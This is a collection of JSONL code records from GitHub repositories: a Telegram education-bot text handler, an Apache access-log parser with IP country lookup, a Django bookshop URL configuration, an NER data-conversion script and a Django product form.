+{"seq_id": "7879568212", "text": "\"\"\"\n Класс направления Текст.\n Идет перенаправление в зависимости от полученного текста.\n\"\"\"\n\nfrom uuid import uuid1\n\nfrom bots.models import Bot, BotAdmin\nfrom edubot.keyboards import admin_kbrd, main_kbrd, plans_kbrd\nfrom edubot.main_classes import BotData, LocalData\nfrom groups.models import Spisok\nfrom plans.models import Plan\n\nfrom .datatypesclass import Observer, Subject\n\n\nclass TextPlan(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'План':\n cur_bot = Bot.objects.get(tg=bot.token)\n cur_user = Spisok.objects.get(chat=local.chat_id)\n groups = cur_user.groupuser.filter(bot=cur_bot)\n plans_info = []\n for group in groups:\n plans = Plan.objects.filter(groupplan=group)\n plans_temp = []\n if plans:\n for plan in plans:\n plans_temp.append({'id': plan.id, 'name': plan.name})\n plans_info.append(\n {'group_id': group.id,\n 'group_name': group.name,\n 'plans': plans_temp}\n )\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Для вас нет плана.',\n }\n if plans_info:\n answer['text'] = 'Выберите тему для работы:'\n answer['reply_markup'] = plans_kbrd(plans_info)\n bot.send_answer(answer)\n\n\nclass TextMessageToTeacher(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Сообщение учителю':\n local.user_edit(state='message_to_teacher')\n admins = local.admins\n number = len(admins)\n text = 'Ваше сообщение получ' + ('ит ' if number == 1 else 'ат:\\n')\n for admin in admins.values():\n text += admin\n text += '\\n'\n answer = {\n 'chat_id': local.chat_id,\n 'text': f'{text}Пишите (только текст):'\n }\n bot.send_answer(answer)\n\n\nclass TextMessageToAdmins(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Сообщение админам':\n local.user_edit(state='message_to_admins')\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Пишите (только текст):'\n }\n bot.send_answer(answer)\n\n\nclass TextSupport(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Техподдержка':\n local.user_edit(state='support')\n answer = {\n 'chat_id': local.chat_id,\n 'text': '''Сообщите, о каком боте идет речь и суть проблемы.\n Пишите сообщение в техподдержку (только текст):'''\n }\n bot.send_answer(answer)\n\n\nclass TextGoToPanel(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Администрировать':\n pin = str(uuid1())\n BotAdmin.objects.filter(chat=local.chat_id).update(pin=pin)\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Для входа в админпанель нажмите кнопку:',\n 'reply_markup': admin_kbrd(local.chat_id, pin),\n }\n bot.send_answer(answer)\n\n\nclass TextHaHaHa(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state not in [\n 'План', 'Сообщение учителю', 'Администрировать',\n 'Сообщение админам', 'Техподдержка']:\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Ага... 
и вам приветик!',\n 'reply_markup': main_kbrd(local.chat_id),\n }\n bot.send_answer(answer)\n", "repo_name": "afoninsb/StudyBotPy", "sub_path": "botproject/edubot/datatypes_classes/textlevel.py", "file_name": "textlevel.py", "file_ext": "py", "file_size_in_byte": 4427, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datatypesclass.Observer", "line_number": 17, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 18, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 18, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 18, "usage_type": "name"}, {"api_name": "bots.models.Bot.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "bots.models.Bot.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "bots.models.Bot", "line_number": 20, "usage_type": "name"}, {"api_name": "groups.models.Spisok.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "groups.models.Spisok.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "groups.models.Spisok", "line_number": 21, "usage_type": "name"}, {"api_name": "groups.models", "line_number": 22, "usage_type": "name"}, {"api_name": "groups.models", "line_number": 24, "usage_type": "name"}, {"api_name": "plans.models", "line_number": 25, "usage_type": "name"}, {"api_name": "plans.models.Plan.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "plans.models.Plan.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "plans.models.Plan", "line_number": 25, "usage_type": "name"}, {"api_name": "plans.models", "line_number": 27, "usage_type": "name"}, {"api_name": "plans.models", "line_number": 28, "usage_type": "name"}, {"api_name": "edubot.keyboards.plans_kbrd", "line_number": 41, "usage_type": "call"}, {"api_name": "datatypesclass.Observer", "line_number": 45, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 46, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 46, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 46, "usage_type": "name"}, {"api_name": "datatypesclass.Observer", "line_number": 62, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 63, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 63, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 63, "usage_type": "name"}, {"api_name": "datatypesclass.Observer", "line_number": 73, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 74, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 74, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 74, "usage_type": "name"}, {"api_name": "datatypesclass.Observer", "line_number": 85, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 86, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 86, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 86, "usage_type": "name"}, {"api_name": "uuid.uuid1", "line_number": 88, "usage_type": "call"}, {"api_name": "bots.models.BotAdmin.objects.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "bots.models.BotAdmin.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": 
"bots.models.BotAdmin", "line_number": 89, "usage_type": "name"}, {"api_name": "edubot.keyboards.admin_kbrd", "line_number": 93, "usage_type": "call"}, {"api_name": "datatypesclass.Observer", "line_number": 98, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 99, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 99, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 99, "usage_type": "name"}, {"api_name": "edubot.keyboards.main_kbrd", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "70574978407", "text": "import pandas as pd\nimport re\nimport time\nimport requests\n\n\ndef dataframeLog(logfile):\n file = open(logfile, 'r')\n dataList = []\n columnList = [\"Ip\", \"Request Line\", \"Status\", \"Referer\"]\n for line in file:\n try:\n matches = None\n pattern = re.compile(\n r'([A-Za-z0-9\\.-_]+)\\s(?:-|.+)\\s(?:-|.+)\\s(?:\\[.+\\])\\s\\\"(.+)\\\"\\s(-|\\d+)\\s(?:-|\\d+)\\s\\\"(-|.*)\\\"\\s\\\"(?:-|.*)\\\"')\n matches = tuple(pattern.findall(line))[0]\n dataList.append(matches)\n except:\n print(line)\n df = pd.DataFrame(dataList, columns=columnList)\n return(df)\n\n\ndef requestSplitter(logfile, typeOfData):\n df = None\n if (typeOfData == 'CSV'):\n df = pd.read_csv(logfile)\n elif(typeOfData == 'dataframe'):\n df = logfile\n df[\"RequestType\"] = None\n df[\"RequestLink\"] = None\n pattern = re.compile(\n r'([A-Z]+|-)\\s*\\**\\s*(.*)\\s*')\n for index, row in df.iterrows():\n try:\n combinedResult = tuple(pattern.findall(row[\"Request Line\"]))[0]\n df.at[index, \"RequestType\"] = combinedResult[0]\n df.at[index, \"RequestLink\"] = combinedResult[1]\n except:\n df.at[index, \"RequestType\"] = \"Unk\"\n df.at[index, \"RequestLink\"] = row[\"Request Line\"]\n\n df = df[['Ip', 'RequestType', 'RequestLink', 'Status',\n 'Referer']]\n return(df)\n\n\ndef requestLineFileSplit(df):\n df[\"RequestFileType\"] = \"\"\n pattern = re.compile(\n r'\\.(\\w{2,3}|(?:[/?{}]+(\\/)\\s))')\n for index, row in df.iterrows():\n try:\n combinedResult = tuple(pattern.findall(row[\"RequestLink\"]))[0]\n df.at[index, \"RequestFileType\"] = combinedResult[0]\n except:\n df.at[index, \"RequestFileType\"] = \"Unk\"\n\n df = df[['Ip', 'RequestType', 'RequestFileType', 'Status',\n 'Referer']]\n return(df)\n\n\ndef refererPreprocess(df):\n df[\"RefererGeneral\"] = \"\"\n pattern = re.compile(\n r'(\\w*\\.\\w*)')\n for index, row in df.iterrows():\n try:\n combinedResult = tuple(pattern.findall(row[\"Referer\"]))[0]\n df.at[index, \"RefererGeneral\"] = combinedResult\n except:\n df.at[index, \"RefererGeneral\"] = \"Unk\"\n\n df = df[['Ip', 'RequestType', 'RequestFileType', 'Status',\n 'RefererGeneral']]\n return(df)\n\n\ndef returnCountryCode(apiKey, ipAddr):\n try:\n data = requests.get(\n \"http://api.ipinfodb.com/v3/ip-country/?key=\"+apiKey+\"&ip=\"+ipAddr+\"&format=json\").json()\n if (data['statusCode'] == \"OK\"):\n return(data['countryCode'])\n else:\n return(\"None\")\n except:\n return(\"None\")\n\n\ndef reverseIpLookup(df, key):\n ipDict = {}\n df[\"Country\"] = ''\n for index, row in df.iterrows():\n if row[\"Ip\"] in ipDict:\n row[\"Country\"] = ipDict[row[\"Ip\"]]\n else:\n print(str(row[\"Ip\"]))\n time.sleep(0.65) # Comment if Paid key is given\n countryCode = returnCountryCode(\n key, row[\"Ip\"])\n ipDict[row[\"Ip\"]] = countryCode\n row[\"Country\"] = countryCode\n return(df)\n\n\ndef accessLogInit(logfile):\n dataFrame = dataframeLog(logfile)\n dataFrame = requestSplitter(dataFrame, 'dataframe')\n dataFrame = requestLineFileSplit(dataFrame)\n dataFrame = refererPreprocess(dataFrame)\n dataFrame = dataFrame.replace(r'\\s+', '-', regex=True).replace('', '-')\n return(dataFrame)\n", "repo_name": "DarrenR96/AI-Apache-Server-Intrusion-Detection-and-Avoidance", "sub_path": "pythonApacheLibrary/apacheLogs.py", "file_name": "apacheLogs.py", "file_ext": "py", "file_size_in_byte": 3477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, 
{"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 32, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 66, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "39669003564", "text": "\"\"\"bookShop URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom myapp.views import views\nfrom myapp.views import users\nfrom myapp.views import cars\nfrom myapp.views import books\nfrom myapp.views import addr\nfrom myapp.views import orders\nfrom myapp.views import comments\nfrom myapp.views import collections\nfrom myapp.views import grades\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.index),\n path('getcode/',users.getCode),\n path('selectBook/',views.selectBook),\n path('showBook/',views.showBook),\n path('selectBookItem/',views.showBookItem),\n path('login/', users.login),\n path('logout/', users.logout),\n path('register/', users.register),\n path('showUser/',users.showUser),\n path('updateUser/',users.updateUser),\n path('updatePwd/',users.updatePwd),\n path('showSeller/',users.showSeller),\n path('addCar/',books.book),#标记\n path('delCar/',cars.delCar),\n path('buyCarBook/',cars.buyCarBook),\n path('selectCar/',cars.selectCar),\n path('updateCar/',cars.updateCar),\n path('book/',books.book),\n path('addBook/',books.addBook),\n path('sellerSelectBook/',books.sellerSelectBook),\n path('buyBook/',books.buyBook),\n path('delBook/',books.delBook),\n path('updateBook/',books.updateBook),\n path('addAddr/',addr.addAddr),\n path('selectAddr/',addr.selectAddr),\n path('delAddr/',addr.delAdddr),\n path('updateAddr/',addr.updateAddr),\n path('addClt/',collections.addCollection),\n path('selectClt/',collections.selectCollection),\n path('delClt/',collections.delCollection),\n path('addOrder/',orders.addOrder),\n path('addCarOrder/',orders.addCarOrder),\n path('payOrder/',orders.payOrder),\n path('notPayOrder/',orders.notPayOrder),\n path('selectOrder/',orders.selectOrder),\n path('updateOrder/',orders.updateOrder),\n path('delOrder/',orders.delOrder),\n path('addComment/',comments.addComment),\n path('updateComment/',comments.updateComment),\n path('delComment/',comments.delComment),\n path('bookSelectComment/',comments.bookSelectComment),\n path('userSelectComment/',comments.userSelectComment),\n path('addGrade/',grades.addGrade),\n path(\"updateOrderStatus/\",orders.updateOrderStatus),\n path(\"showDetails/\",orders.showDetails),\n path(\"chat/\",users.chat),\n path(\"shoppay/\",views.shoppay),\n] + static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)", "repo_name": "HouYingping/bookShop", "sub_path": "bookShop/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 31, 
"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "myapp.views.views.index", "line_number": 32, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "myapp.views.users.getCode", "line_number": 33, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "myapp.views.views.selectBook", "line_number": 34, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "myapp.views.views.showBook", "line_number": 35, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "myapp.views.views.showBookItem", "line_number": 36, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "myapp.views.users.login", "line_number": 37, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "myapp.views.users.logout", "line_number": 38, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "myapp.views.users.register", "line_number": 39, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "myapp.views.users.showUser", "line_number": 40, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "myapp.views.users.updateUser", "line_number": 41, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 41, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "myapp.views.users.updatePwd", "line_number": 42, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 42, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "myapp.views.users.showSeller", "line_number": 43, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 43, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "myapp.views.books.book", "line_number": 44, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 44, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "myapp.views.cars.delCar", "line_number": 45, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 45, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "myapp.views.cars.buyCarBook", "line_number": 46, "usage_type": 
"attribute"}, {"api_name": "myapp.views.cars", "line_number": 46, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "myapp.views.cars.selectCar", "line_number": 47, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 47, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 48, "usage_type": "call"}, {"api_name": "myapp.views.cars.updateCar", "line_number": 48, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 48, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "myapp.views.books.book", "line_number": 49, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 49, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "myapp.views.books.addBook", "line_number": 50, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 50, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "myapp.views.books.sellerSelectBook", "line_number": 51, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 51, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "myapp.views.books.buyBook", "line_number": 52, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 52, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "myapp.views.books.delBook", "line_number": 53, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 53, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "myapp.views.books.updateBook", "line_number": 54, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 54, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}, {"api_name": "myapp.views.addr.addAddr", "line_number": 55, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 55, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "myapp.views.addr.selectAddr", "line_number": 56, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 56, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "myapp.views.addr.delAdddr", "line_number": 57, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 57, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 58, "usage_type": "call"}, {"api_name": "myapp.views.addr.updateAddr", "line_number": 58, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 58, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "myapp.views.collections.addCollection", "line_number": 59, "usage_type": "attribute"}, {"api_name": "myapp.views.collections", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 60, "usage_type": "call"}, {"api_name": "myapp.views.collections.selectCollection", "line_number": 60, "usage_type": "attribute"}, {"api_name": "myapp.views.collections", "line_number": 60, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 61, 
"usage_type": "call"}, {"api_name": "myapp.views.collections.delCollection", "line_number": 61, "usage_type": "attribute"}, {"api_name": "myapp.views.collections", "line_number": 61, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "myapp.views.orders.addOrder", "line_number": 62, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "myapp.views.orders.addCarOrder", "line_number": 63, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 64, "usage_type": "call"}, {"api_name": "myapp.views.orders.payOrder", "line_number": 64, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "myapp.views.orders.notPayOrder", "line_number": 65, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "myapp.views.orders.selectOrder", "line_number": 66, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 66, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 67, "usage_type": "call"}, {"api_name": "myapp.views.orders.updateOrder", "line_number": 67, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 67, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 68, "usage_type": "call"}, {"api_name": "myapp.views.orders.delOrder", "line_number": 68, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 68, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 69, "usage_type": "call"}, {"api_name": "myapp.views.comments.addComment", "line_number": 69, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 69, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 70, "usage_type": "call"}, {"api_name": "myapp.views.comments.updateComment", "line_number": 70, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 70, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 71, "usage_type": "call"}, {"api_name": "myapp.views.comments.delComment", "line_number": 71, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 71, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 72, "usage_type": "call"}, {"api_name": "myapp.views.comments.bookSelectComment", "line_number": 72, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 72, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 73, "usage_type": "call"}, {"api_name": "myapp.views.comments.userSelectComment", "line_number": 73, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 73, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 74, "usage_type": "call"}, {"api_name": "myapp.views.grades.addGrade", "line_number": 74, "usage_type": "attribute"}, {"api_name": "myapp.views.grades", "line_number": 74, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 75, "usage_type": "call"}, {"api_name": "myapp.views.orders.updateOrderStatus", 
"line_number": 75, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 75, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 76, "usage_type": "call"}, {"api_name": "myapp.views.orders.showDetails", "line_number": 76, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 76, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 77, "usage_type": "call"}, {"api_name": "myapp.views.users.chat", "line_number": 77, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 77, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 78, "usage_type": "call"}, {"api_name": "myapp.views.views.shoppay", "line_number": 78, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 78, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 79, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 79, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 79, "usage_type": "attribute"}]}
+{"seq_id": "30473219782", "text": "# encoding:utf-8\n'''\n@Author: catnlp\n@Email: wk_nlp@163.com\n@Time: 2018/5/24 15:48\n'''\nimport os\nimport json\nimport openpyxl\n\nclass Origin2Raw:\n def __init__(self, path, save):\n if os.path.exists(path):\n if path[-1] != '/':\n path += '/'\n self.path = path\n else:\n print('Folder does not exists!')\n exit(1)\n\n if not os.path.exists(save):\n os.makedirs(save)\n if save[-1] != '/':\n save += '/'\n self.save = save\n\n print('Origin path: %s', self.path)\n print('Raw path: %s', self.save)\n\n def excel2dict(self, dict_name, save_name='dict.txt', sheet_name=None):\n dict_path = self.path + dict_name\n print('Excel path: %s', dict_path)\n if not os.path.exists(dict_path):\n print('Excel does not exists!')\n exit(1)\n save_path = self.save + save_name\n\n work_book = openpyxl.load_workbook(dict_path)\n if sheet_name:\n sheet = work_book.get_sheet_by_name(sheet_name)\n else:\n sheet_names = work_book.get_sheet_names()\n sheet = work_book.get_sheet_by_name(sheet_names[0])\n\n with open(save_path, 'w') as dict:\n for row in range(1, sheet.max_row):\n dict.write(sheet.cell(row+1, 2).value + '\\t' + sheet.cell(row+1, 3).value + '\\n')\n print(sheet.cell(row+1, 2).value + '\\t' + sheet.cell(row+1, 3).value)\n\n def json2text(self, save_name='raw.txt', json_suffix='jsonl'):\n save_path = self.save + save_name\n with open(save_path, 'w') as raw:\n for parent, dirnames, filenames in os.walk(self.path):\n for filename in filenames:\n if filename.endswith(json_suffix) and filename.find('17') == -1:\n file_path = os.path.join(parent, filename)\n print('文件名:%s' % filename)\n print('文件完整路径:%s\\n' % file_path)\n with open(file_path) as origin:\n lines = origin.readlines()\n for line in lines:\n dict = json.loads(line)\n if dict['answer'] == 'accept':\n raw.write(dict['text'] + '\\n')\n\nif __name__ == '__main__':\n origin2raw = Origin2Raw('../data/origin/Anti-fraud Product Data', '../data/raw')\n origin2raw.excel2dict('Entity Dictionary.xlsx')\n origin2raw.json2text()", "repo_name": "catnlp/DomainNER", "sub_path": "utils/origin2raw.py", "file_name": "origin2raw.py", "file_ext": "py", "file_size_in_byte": 2547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "openpyxl.load_workbook", "line_number": 38, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "37072656022", "text": "from django import forms\nfrom .widgets import CustomClearableFileInput\nfrom .models import Product, Category, Brand\n\n\nclass ProductForm(forms.ModelForm):\n\n class Meta:\n model = Product\n fields = '__all__'\n\n image = forms.ImageField(label='Image', required=False,\n widget=CustomClearableFileInput)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n categories = Category.objects.all()\n brands = Brand.objects.all()\n friendly_names = [(c.id, c.get_friendly_name()) for c in categories]\n friendly_names_brand = [(b.id, b.get_friendly_name()) for b in brands]\n\n self.fields['category'].choices = friendly_names\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = ''\n\n self.fields['brand'].choices = friendly_names_brand\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = ''\n", "repo_name": "Mathias-SantAnna/lotr-collectibles", "sub_path": "products/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Product", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.ImageField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "widgets.CustomClearableFileInput", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Brand.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Brand.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Brand", "line_number": 18, "usage_type": "name"}]}
